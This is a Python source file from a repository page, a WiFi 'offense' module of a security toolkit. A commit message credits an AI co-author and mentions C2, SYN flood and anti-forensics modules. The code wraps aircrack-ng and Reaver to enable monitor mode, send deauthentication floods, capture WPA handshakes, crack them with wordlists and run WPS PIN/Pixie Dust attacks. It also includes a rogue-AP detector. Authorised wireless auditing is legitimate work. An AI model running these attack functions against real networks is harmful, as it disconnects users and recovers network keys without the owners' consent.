sssnake/Autarch
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Autarch/modules/wifi_audit.py

844 lines
36 KiB
Python
Raw Normal View History

v2.2.0 — Full arsenal expansion: 16 new security modules Add WiFi Audit, API Fuzzer, Cloud Scanner, Threat Intel, Log Correlator, Steganography, Anti-Forensics, BLE Scanner, Forensics, RFID/NFC, Malware Sandbox, Password Toolkit, Web Scanner, Report Engine, Net Mapper, and C2 Framework. Each module includes CLI interface, Flask routes, and web UI template. Also includes Go DNS server source + binary, IP Capture service, SYN Flood, Gone Fishing mail server, and hack hijack modules from v2.0 work. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-03 05:16:31 -08:00
"""AUTARCH WiFi Auditing
Interface management, network discovery, handshake capture, deauth attack,
rogue AP detection, WPS attack, and packet capture for wireless security auditing.
"""
DESCRIPTION = "WiFi network auditing & attack tools"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "offense"
import os
import re
import json
import time
import signal
import shutil
import threading
import subprocess
from pathlib import Path
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any, Tuple
try:
from core.paths import find_tool, get_data_dir
except ImportError:
def find_tool(name):
return shutil.which(name)
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
# ── Data Structures ──────────────────────────────────────────────────────────
@dataclass
class AccessPoint:
bssid: str
ssid: str = ""
channel: int = 0
encryption: str = ""
cipher: str = ""
auth: str = ""
signal: int = 0
beacons: int = 0
data_frames: int = 0
clients: List[str] = field(default_factory=list)
@dataclass
class WifiClient:
mac: str
bssid: str = ""
signal: int = 0
frames: int = 0
probe: str = ""
# ── WiFi Auditor ─────────────────────────────────────────────────────────────
class WiFiAuditor:
"""WiFi auditing toolkit using aircrack-ng suite."""
def __init__(self):
self.data_dir = os.path.join(get_data_dir(), 'wifi')
os.makedirs(self.data_dir, exist_ok=True)
self.captures_dir = os.path.join(self.data_dir, 'captures')
os.makedirs(self.captures_dir, exist_ok=True)
# Tool paths
self.airmon = find_tool('airmon-ng') or shutil.which('airmon-ng')
self.airodump = find_tool('airodump-ng') or shutil.which('airodump-ng')
self.aireplay = find_tool('aireplay-ng') or shutil.which('aireplay-ng')
self.aircrack = find_tool('aircrack-ng') or shutil.which('aircrack-ng')
self.reaver = find_tool('reaver') or shutil.which('reaver')
self.wash = find_tool('wash') or shutil.which('wash')
self.iwconfig = shutil.which('iwconfig')
self.iw = shutil.which('iw')
self.ip_cmd = shutil.which('ip')
# State
self.monitor_interface: Optional[str] = None
self.scan_results: Dict[str, AccessPoint] = {}
self.clients: List[WifiClient] = []
self.known_aps: List[Dict] = []
self._scan_proc: Optional[subprocess.Popen] = None
self._capture_proc: Optional[subprocess.Popen] = None
self._jobs: Dict[str, Dict] = {}
def get_tools_status(self) -> Dict[str, bool]:
"""Check availability of all required tools."""
return {
'airmon-ng': self.airmon is not None,
'airodump-ng': self.airodump is not None,
'aireplay-ng': self.aireplay is not None,
'aircrack-ng': self.aircrack is not None,
'reaver': self.reaver is not None,
'wash': self.wash is not None,
'iwconfig': self.iwconfig is not None,
'iw': self.iw is not None,
'ip': self.ip_cmd is not None,
}
# ── Interface Management ─────────────────────────────────────────────
def get_interfaces(self) -> List[Dict]:
"""List wireless interfaces."""
interfaces = []
# Try iw first
if self.iw:
try:
out = subprocess.check_output([self.iw, 'dev'], text=True, timeout=5)
iface = None
for line in out.splitlines():
line = line.strip()
if line.startswith('Interface'):
iface = {'name': line.split()[-1], 'mode': 'managed', 'channel': 0, 'mac': ''}
elif iface:
if line.startswith('type'):
iface['mode'] = line.split()[-1]
elif line.startswith('channel'):
try:
iface['channel'] = int(line.split()[1])
except (ValueError, IndexError):
pass
elif line.startswith('addr'):
iface['mac'] = line.split()[-1]
if iface:
interfaces.append(iface)
except Exception:
pass
# Fallback to iwconfig
if not interfaces and self.iwconfig:
try:
out = subprocess.check_output([self.iwconfig], text=True,
stderr=subprocess.DEVNULL, timeout=5)
for block in out.split('\n\n'):
if 'IEEE 802.11' in block or 'ESSID' in block:
name = block.split()[0]
mode = 'managed'
if 'Mode:Monitor' in block:
mode = 'monitor'
elif 'Mode:Master' in block:
mode = 'master'
freq_m = re.search(r'Channel[:\s]*(\d+)', block)
ch = int(freq_m.group(1)) if freq_m else 0
interfaces.append({'name': name, 'mode': mode, 'channel': ch, 'mac': ''})
except Exception:
pass
# Fallback: list from /sys
if not interfaces:
try:
wireless_dir = Path('/sys/class/net')
if wireless_dir.exists():
for d in wireless_dir.iterdir():
if (d / 'wireless').exists() or (d / 'phy80211').exists():
interfaces.append({
'name': d.name, 'mode': 'unknown', 'channel': 0, 'mac': ''
})
except Exception:
pass
return interfaces
def enable_monitor(self, interface: str) -> Dict:
"""Put interface into monitor mode."""
if not self.airmon:
return {'ok': False, 'error': 'airmon-ng not found'}
try:
# Kill interfering processes
subprocess.run([self.airmon, 'check', 'kill'],
capture_output=True, text=True, timeout=10)
# Enable monitor mode
result = subprocess.run([self.airmon, 'start', interface],
capture_output=True, text=True, timeout=10)
# Detect monitor interface name (usually wlan0mon or similar)
mon_iface = interface + 'mon'
for line in result.stdout.splitlines():
m = re.search(r'\(monitor mode.*enabled.*on\s+(\S+)\)', line, re.I)
if m:
mon_iface = m.group(1)
break
m = re.search(r'monitor mode.*vif.*enabled.*for.*\[(\S+)\]', line, re.I)
if m:
mon_iface = m.group(1)
break
self.monitor_interface = mon_iface
return {'ok': True, 'interface': mon_iface, 'message': f'Monitor mode enabled on {mon_iface}'}
except subprocess.TimeoutExpired:
return {'ok': False, 'error': 'Timeout enabling monitor mode'}
except Exception as e:
return {'ok': False, 'error': str(e)}
def disable_monitor(self, interface: str = None) -> Dict:
"""Disable monitor mode and restore managed mode."""
if not self.airmon:
return {'ok': False, 'error': 'airmon-ng not found'}
iface = interface or self.monitor_interface
if not iface:
return {'ok': False, 'error': 'No monitor interface specified'}
try:
result = subprocess.run([self.airmon, 'stop', iface],
capture_output=True, text=True, timeout=10)
self.monitor_interface = None
# Restart network manager
subprocess.run(['systemctl', 'start', 'NetworkManager'],
capture_output=True, timeout=5)
return {'ok': True, 'message': f'Monitor mode disabled on {iface}'}
except Exception as e:
return {'ok': False, 'error': str(e)}
def set_channel(self, interface: str, channel: int) -> Dict:
"""Set wireless interface channel."""
if self.iw:
try:
subprocess.run([self.iw, 'dev', interface, 'set', 'channel', str(channel)],
capture_output=True, text=True, timeout=5)
return {'ok': True, 'channel': channel}
except Exception as e:
return {'ok': False, 'error': str(e)}
return {'ok': False, 'error': 'iw not found'}
# ── Network Scanning ─────────────────────────────────────────────────
def scan_networks(self, interface: str = None, duration: int = 15) -> Dict:
"""Scan for nearby wireless networks using airodump-ng."""
iface = interface or self.monitor_interface
if not iface:
return {'ok': False, 'error': 'No monitor interface. Enable monitor mode first.'}
if not self.airodump:
return {'ok': False, 'error': 'airodump-ng not found'}
prefix = os.path.join(self.captures_dir, f'scan_{int(time.time())}')
try:
proc = subprocess.Popen(
[self.airodump, '--output-format', 'csv', '-w', prefix, iface],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
)
time.sleep(duration)
proc.send_signal(signal.SIGINT)
proc.wait(timeout=5)
# Parse CSV output
csv_file = prefix + '-01.csv'
if os.path.exists(csv_file):
self._parse_airodump_csv(csv_file)
return {
'ok': True,
'access_points': [self._ap_to_dict(ap) for ap in self.scan_results.values()],
'clients': [self._client_to_dict(c) for c in self.clients],
'count': len(self.scan_results)
}
return {'ok': False, 'error': 'No scan output produced'}
except Exception as e:
return {'ok': False, 'error': str(e)}
def _parse_airodump_csv(self, filepath: str):
"""Parse airodump-ng CSV output."""
self.scan_results.clear()
self.clients.clear()
try:
with open(filepath, 'r', errors='ignore') as f:
content = f.read()
# Split into AP section and client section
sections = content.split('Station MAC')
ap_section = sections[0] if sections else ''
client_section = sections[1] if len(sections) > 1 else ''
# Parse APs
for line in ap_section.splitlines():
parts = [p.strip() for p in line.split(',')]
if len(parts) >= 14 and re.match(r'^[0-9A-Fa-f]{2}:', parts[0]):
bssid = parts[0].upper()
ap = AccessPoint(
bssid=bssid,
channel=int(parts[3]) if parts[3].strip().isdigit() else 0,
signal=int(parts[8]) if parts[8].strip().lstrip('-').isdigit() else 0,
encryption=parts[5].strip(),
cipher=parts[6].strip(),
auth=parts[7].strip(),
beacons=int(parts[9]) if parts[9].strip().isdigit() else 0,
data_frames=int(parts[10]) if parts[10].strip().isdigit() else 0,
ssid=parts[13].strip() if len(parts) > 13 else ''
)
self.scan_results[bssid] = ap
# Parse clients
for line in client_section.splitlines():
parts = [p.strip() for p in line.split(',')]
if len(parts) >= 6 and re.match(r'^[0-9A-Fa-f]{2}:', parts[0]):
client = WifiClient(
mac=parts[0].upper(),
signal=int(parts[3]) if parts[3].strip().lstrip('-').isdigit() else 0,
frames=int(parts[4]) if parts[4].strip().isdigit() else 0,
bssid=parts[5].strip().upper() if len(parts) > 5 else '',
probe=parts[6].strip() if len(parts) > 6 else ''
)
self.clients.append(client)
# Associate with AP
if client.bssid in self.scan_results:
self.scan_results[client.bssid].clients.append(client.mac)
except Exception:
pass
def get_scan_results(self) -> Dict:
"""Return current scan results."""
return {
'access_points': [self._ap_to_dict(ap) for ap in self.scan_results.values()],
'clients': [self._client_to_dict(c) for c in self.clients],
'count': len(self.scan_results)
}
# ── Handshake Capture ────────────────────────────────────────────────
def capture_handshake(self, interface: str, bssid: str, channel: int,
deauth_count: int = 5, timeout: int = 60) -> str:
"""Capture WPA handshake. Returns job_id for async polling."""
job_id = f'handshake_{int(time.time())}'
self._jobs[job_id] = {
'type': 'handshake', 'status': 'running', 'bssid': bssid,
'result': None, 'started': time.time()
}
def _capture():
try:
# Set channel
self.set_channel(interface, channel)
prefix = os.path.join(self.captures_dir, f'hs_{bssid.replace(":", "")}_{int(time.time())}')
# Start capture
cap_proc = subprocess.Popen(
[self.airodump, '-c', str(channel), '--bssid', bssid,
'-w', prefix, interface],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
)
# Send deauths after short delay
time.sleep(3)
if self.aireplay:
subprocess.run(
[self.aireplay, '-0', str(deauth_count), '-a', bssid, interface],
capture_output=True, timeout=15
)
# Wait for handshake
cap_file = prefix + '-01.cap'
start = time.time()
captured = False
while time.time() - start < timeout:
if os.path.exists(cap_file) and self.aircrack:
check = subprocess.run(
[self.aircrack, '-a', '2', '-b', bssid, cap_file],
capture_output=True, text=True, timeout=10
)
if '1 handshake' in check.stdout.lower() or 'valid handshake' in check.stdout.lower():
captured = True
break
time.sleep(2)
cap_proc.send_signal(signal.SIGINT)
cap_proc.wait(timeout=5)
if captured:
self._jobs[job_id]['status'] = 'complete'
self._jobs[job_id]['result'] = {
'ok': True, 'capture_file': cap_file, 'bssid': bssid,
'message': f'Handshake captured for {bssid}'
}
else:
self._jobs[job_id]['status'] = 'complete'
self._jobs[job_id]['result'] = {
'ok': False, 'error': 'Handshake capture timed out',
'capture_file': cap_file if os.path.exists(cap_file) else None
}
except Exception as e:
self._jobs[job_id]['status'] = 'error'
self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)}
threading.Thread(target=_capture, daemon=True).start()
return job_id
def crack_handshake(self, capture_file: str, wordlist: str, bssid: str = None) -> str:
"""Crack captured handshake with wordlist. Returns job_id."""
if not self.aircrack:
return ''
job_id = f'crack_{int(time.time())}'
self._jobs[job_id] = {
'type': 'crack', 'status': 'running',
'result': None, 'started': time.time()
}
def _crack():
try:
cmd = [self.aircrack, '-w', wordlist, '-b', bssid, capture_file] if bssid else \
[self.aircrack, '-w', wordlist, capture_file]
result = subprocess.run(cmd, capture_output=True, text=True, timeout=3600)
# Parse result
key_match = re.search(r'KEY FOUND!\s*\[\s*(.+?)\s*\]', result.stdout)
if key_match:
self._jobs[job_id]['status'] = 'complete'
self._jobs[job_id]['result'] = {
'ok': True, 'key': key_match.group(1), 'message': 'Key found!'
}
else:
self._jobs[job_id]['status'] = 'complete'
self._jobs[job_id]['result'] = {
'ok': False, 'error': 'Key not found in wordlist'
}
except subprocess.TimeoutExpired:
self._jobs[job_id]['status'] = 'error'
self._jobs[job_id]['result'] = {'ok': False, 'error': 'Crack timeout (1hr)'}
except Exception as e:
self._jobs[job_id]['status'] = 'error'
self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)}
threading.Thread(target=_crack, daemon=True).start()
return job_id
# ── Deauth Attack ────────────────────────────────────────────────────
def deauth(self, interface: str, bssid: str, client: str = None,
count: int = 10) -> Dict:
"""Send deauthentication frames."""
if not self.aireplay:
return {'ok': False, 'error': 'aireplay-ng not found'}
iface = interface or self.monitor_interface
if not iface:
return {'ok': False, 'error': 'No monitor interface'}
try:
cmd = [self.aireplay, '-0', str(count), '-a', bssid]
if client:
cmd += ['-c', client]
cmd.append(iface)
result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
return {
'ok': True,
'message': f'Sent {count} deauth frames to {bssid}' +
(f' targeting {client}' if client else ' (broadcast)'),
'output': result.stdout
}
except subprocess.TimeoutExpired:
return {'ok': False, 'error': 'Deauth timeout'}
except Exception as e:
return {'ok': False, 'error': str(e)}
# ── Rogue AP Detection ───────────────────────────────────────────────
def save_known_aps(self):
"""Save current scan as known/baseline APs."""
self.known_aps = [self._ap_to_dict(ap) for ap in self.scan_results.values()]
known_file = os.path.join(self.data_dir, 'known_aps.json')
with open(known_file, 'w') as f:
json.dump(self.known_aps, f, indent=2)
return {'ok': True, 'count': len(self.known_aps)}
def load_known_aps(self) -> List[Dict]:
"""Load previously saved known APs."""
known_file = os.path.join(self.data_dir, 'known_aps.json')
if os.path.exists(known_file):
with open(known_file) as f:
self.known_aps = json.load(f)
return self.known_aps
def detect_rogue_aps(self) -> Dict:
"""Compare current scan against known APs to detect evil twins/rogues."""
if not self.known_aps:
self.load_known_aps()
if not self.known_aps:
return {'ok': False, 'error': 'No baseline APs saved. Run save_known_aps first.'}
known_bssids = {ap['bssid'] for ap in self.known_aps}
known_ssids = {ap['ssid'] for ap in self.known_aps if ap['ssid']}
known_pairs = {(ap['bssid'], ap['ssid']) for ap in self.known_aps}
alerts = []
for bssid, ap in self.scan_results.items():
if bssid not in known_bssids:
if ap.ssid in known_ssids:
# Same SSID, different BSSID = possible evil twin
alerts.append({
'type': 'evil_twin',
'severity': 'high',
'bssid': bssid,
'ssid': ap.ssid,
'channel': ap.channel,
'signal': ap.signal,
'message': f'Possible evil twin: SSID "{ap.ssid}" from unknown BSSID {bssid}'
})
else:
# Completely new AP
alerts.append({
'type': 'new_ap',
'severity': 'low',
'bssid': bssid,
'ssid': ap.ssid,
'channel': ap.channel,
'signal': ap.signal,
'message': f'New AP detected: "{ap.ssid}" ({bssid})'
})
else:
# Known BSSID but check for SSID change
if (bssid, ap.ssid) not in known_pairs and ap.ssid:
alerts.append({
'type': 'ssid_change',
'severity': 'medium',
'bssid': bssid,
'ssid': ap.ssid,
'message': f'Known AP {bssid} changed SSID to "{ap.ssid}"'
})
return {
'ok': True,
'alerts': alerts,
'alert_count': len(alerts),
'scanned': len(self.scan_results),
'known': len(self.known_aps)
}
# ── WPS Attack ───────────────────────────────────────────────────────
def wps_scan(self, interface: str = None) -> Dict:
"""Scan for WPS-enabled networks using wash."""
iface = interface or self.monitor_interface
if not self.wash:
return {'ok': False, 'error': 'wash not found'}
if not iface:
return {'ok': False, 'error': 'No monitor interface'}
try:
result = subprocess.run(
[self.wash, '-i', iface, '-s'],
capture_output=True, text=True, timeout=15
)
networks = []
for line in result.stdout.splitlines():
parts = line.split()
if len(parts) >= 6 and re.match(r'^[0-9A-Fa-f]{2}:', parts[0]):
networks.append({
'bssid': parts[0],
'channel': parts[1],
'rssi': parts[2],
'wps_version': parts[3],
'locked': parts[4].upper() == 'YES',
'ssid': ' '.join(parts[5:])
})
return {'ok': True, 'networks': networks, 'count': len(networks)}
except Exception as e:
return {'ok': False, 'error': str(e)}
def wps_attack(self, interface: str, bssid: str, channel: int,
pixie_dust: bool = True, timeout: int = 300) -> str:
"""Run WPS PIN attack (Pixie Dust or brute force). Returns job_id."""
if not self.reaver:
return ''
job_id = f'wps_{int(time.time())}'
self._jobs[job_id] = {
'type': 'wps', 'status': 'running', 'bssid': bssid,
'result': None, 'started': time.time()
}
def _attack():
try:
cmd = [self.reaver, '-i', interface, '-b', bssid, '-c', str(channel), '-vv']
if pixie_dust:
cmd.extend(['-K', '1'])
result = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
pin_match = re.search(r'WPS PIN:\s*[\'"]?(\d+)', result.stdout)
psk_match = re.search(r'WPA PSK:\s*[\'"]?(.+?)[\'"]?\s*$', result.stdout, re.M)
if pin_match or psk_match:
self._jobs[job_id]['status'] = 'complete'
self._jobs[job_id]['result'] = {
'ok': True,
'pin': pin_match.group(1) if pin_match else None,
'psk': psk_match.group(1) if psk_match else None,
'message': 'WPS attack successful'
}
else:
self._jobs[job_id]['status'] = 'complete'
self._jobs[job_id]['result'] = {
'ok': False, 'error': 'WPS attack failed',
'output': result.stdout[-500:] if result.stdout else ''
}
except subprocess.TimeoutExpired:
self._jobs[job_id]['status'] = 'error'
self._jobs[job_id]['result'] = {'ok': False, 'error': 'WPS attack timed out'}
except Exception as e:
self._jobs[job_id]['status'] = 'error'
self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)}
threading.Thread(target=_attack, daemon=True).start()
return job_id
# ── Packet Capture ───────────────────────────────────────────────────
def start_capture(self, interface: str, channel: int = None,
bssid: str = None, output_name: str = None) -> Dict:
"""Start raw packet capture on interface."""
if not self.airodump:
return {'ok': False, 'error': 'airodump-ng not found'}
iface = interface or self.monitor_interface
if not iface:
return {'ok': False, 'error': 'No monitor interface'}
name = output_name or f'capture_{int(time.time())}'
prefix = os.path.join(self.captures_dir, name)
cmd = [self.airodump, '--output-format', 'pcap,csv', '-w', prefix]
if channel:
cmd += ['-c', str(channel)]
if bssid:
cmd += ['--bssid', bssid]
cmd.append(iface)
try:
self._capture_proc = subprocess.Popen(
cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
)
return {
'ok': True,
'message': f'Capture started on {iface}',
'prefix': prefix,
'pid': self._capture_proc.pid
}
except Exception as e:
return {'ok': False, 'error': str(e)}
def stop_capture(self) -> Dict:
"""Stop running packet capture."""
if self._capture_proc:
try:
self._capture_proc.send_signal(signal.SIGINT)
self._capture_proc.wait(timeout=5)
except Exception:
self._capture_proc.kill()
self._capture_proc = None
return {'ok': True, 'message': 'Capture stopped'}
return {'ok': False, 'error': 'No capture running'}
def list_captures(self) -> List[Dict]:
"""List saved capture files."""
captures = []
cap_dir = Path(self.captures_dir)
for f in sorted(cap_dir.glob('*.cap')) + sorted(cap_dir.glob('*.pcap')):
captures.append({
'name': f.name,
'path': str(f),
'size': f.stat().st_size,
'modified': f.stat().st_mtime
})
return captures
# ── Job Management ───────────────────────────────────────────────────
def get_job(self, job_id: str) -> Optional[Dict]:
"""Get job status."""
return self._jobs.get(job_id)
def list_jobs(self) -> List[Dict]:
"""List all jobs."""
return [{'id': k, **v} for k, v in self._jobs.items()]
# ── Helpers ──────────────────────────────────────────────────────────
def _ap_to_dict(self, ap: AccessPoint) -> Dict:
return {
'bssid': ap.bssid, 'ssid': ap.ssid, 'channel': ap.channel,
'encryption': ap.encryption, 'cipher': ap.cipher, 'auth': ap.auth,
'signal': ap.signal, 'beacons': ap.beacons,
'data_frames': ap.data_frames, 'clients': ap.clients
}
def _client_to_dict(self, c: WifiClient) -> Dict:
return {
'mac': c.mac, 'bssid': c.bssid, 'signal': c.signal,
'frames': c.frames, 'probe': c.probe
}
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None
def get_wifi_auditor() -> WiFiAuditor:
global _instance
if _instance is None:
_instance = WiFiAuditor()
return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
"""CLI entry point for WiFi Auditing module."""
auditor = get_wifi_auditor()
while True:
tools = auditor.get_tools_status()
available = sum(1 for v in tools.values() if v)
print(f"\n{'='*60}")
print(f" WiFi Auditing ({available}/{len(tools)} tools available)")
print(f"{'='*60}")
print(f" Monitor Interface: {auditor.monitor_interface or 'None'}")
print(f" APs Found: {len(auditor.scan_results)}")
print(f" Clients Found: {len(auditor.clients)}")
print()
print(" 1 — List Wireless Interfaces")
print(" 2 — Enable Monitor Mode")
print(" 3 — Disable Monitor Mode")
print(" 4 — Scan Networks")
print(" 5 — Deauth Attack")
print(" 6 — Capture Handshake")
print(" 7 — Crack Handshake")
print(" 8 — WPS Scan")
print(" 9 — Rogue AP Detection")
print(" 10 — Packet Capture")
print(" 11 — Tool Status")
print(" 0 — Back")
print()
choice = input(" > ").strip()
if choice == '0':
break
elif choice == '1':
ifaces = auditor.get_interfaces()
if ifaces:
for i in ifaces:
print(f" {i['name']} mode={i['mode']} ch={i['channel']}")
else:
print(" No wireless interfaces found")
elif choice == '2':
iface = input(" Interface name: ").strip()
result = auditor.enable_monitor(iface)
print(f" {result.get('message', result.get('error', 'Unknown'))}")
elif choice == '3':
result = auditor.disable_monitor()
print(f" {result.get('message', result.get('error', 'Unknown'))}")
elif choice == '4':
dur = input(" Scan duration (seconds, default 15): ").strip()
result = auditor.scan_networks(duration=int(dur) if dur.isdigit() else 15)
if result['ok']:
print(f" Found {result['count']} access points:")
for ap in result['access_points']:
print(f" {ap['bssid']} {ap['ssid']:<24} ch={ap['channel']} "
f"sig={ap['signal']}dBm {ap['encryption']}")
else:
print(f" Error: {result['error']}")
elif choice == '5':
bssid = input(" Target BSSID: ").strip()
client = input(" Client MAC (blank=broadcast): ").strip() or None
count = input(" Deauth count (default 10): ").strip()
result = auditor.deauth(auditor.monitor_interface, bssid, client,
int(count) if count.isdigit() else 10)
print(f" {result.get('message', result.get('error'))}")
elif choice == '6':
bssid = input(" Target BSSID: ").strip()
channel = input(" Channel: ").strip()
if bssid and channel.isdigit():
job_id = auditor.capture_handshake(auditor.monitor_interface, bssid, int(channel))
print(f" Handshake capture started (job: {job_id})")
print(" Polling for result...")
while True:
job = auditor.get_job(job_id)
if job and job['status'] != 'running':
print(f" Result: {job['result']}")
break
time.sleep(3)
elif choice == '7':
cap = input(" Capture file path: ").strip()
wl = input(" Wordlist path: ").strip()
bssid = input(" BSSID (optional): ").strip() or None
if cap and wl:
job_id = auditor.crack_handshake(cap, wl, bssid)
if job_id:
print(f" Cracking started (job: {job_id})")
else:
print(" aircrack-ng not found")
elif choice == '8':
result = auditor.wps_scan()
if result['ok']:
print(f" Found {result['count']} WPS networks:")
for n in result['networks']:
locked = 'LOCKED' if n['locked'] else 'open'
print(f" {n['bssid']} {n['ssid']:<24} WPS {n['wps_version']} {locked}")
else:
print(f" Error: {result['error']}")
elif choice == '9':
if not auditor.known_aps:
print(" No baseline saved. Save current scan as baseline? (y/n)")
if input(" > ").strip().lower() == 'y':
auditor.save_known_aps()
print(f" Saved {len(auditor.known_aps)} APs as baseline")
else:
result = auditor.detect_rogue_aps()
if result['ok']:
print(f" Scanned: {result['scanned']} Known: {result['known']} Alerts: {result['alert_count']}")
for a in result['alerts']:
print(f" [{a['severity'].upper()}] {a['message']}")
elif choice == '10':
print(" 1 — Start Capture")
print(" 2 — Stop Capture")
print(" 3 — List Captures")
sub = input(" > ").strip()
if sub == '1':
result = auditor.start_capture(auditor.monitor_interface)
print(f" {result.get('message', result.get('error'))}")
elif sub == '2':
result = auditor.stop_capture()
print(f" {result.get('message', result.get('error'))}")
elif sub == '3':
for c in auditor.list_captures():
print(f" {c['name']} ({c['size']} bytes)")
elif choice == '11':
for tool, avail in tools.items():
status = 'OK' if avail else 'MISSING'
print(f" {tool:<15} {status}")
Reference in New Issue Copy Permalink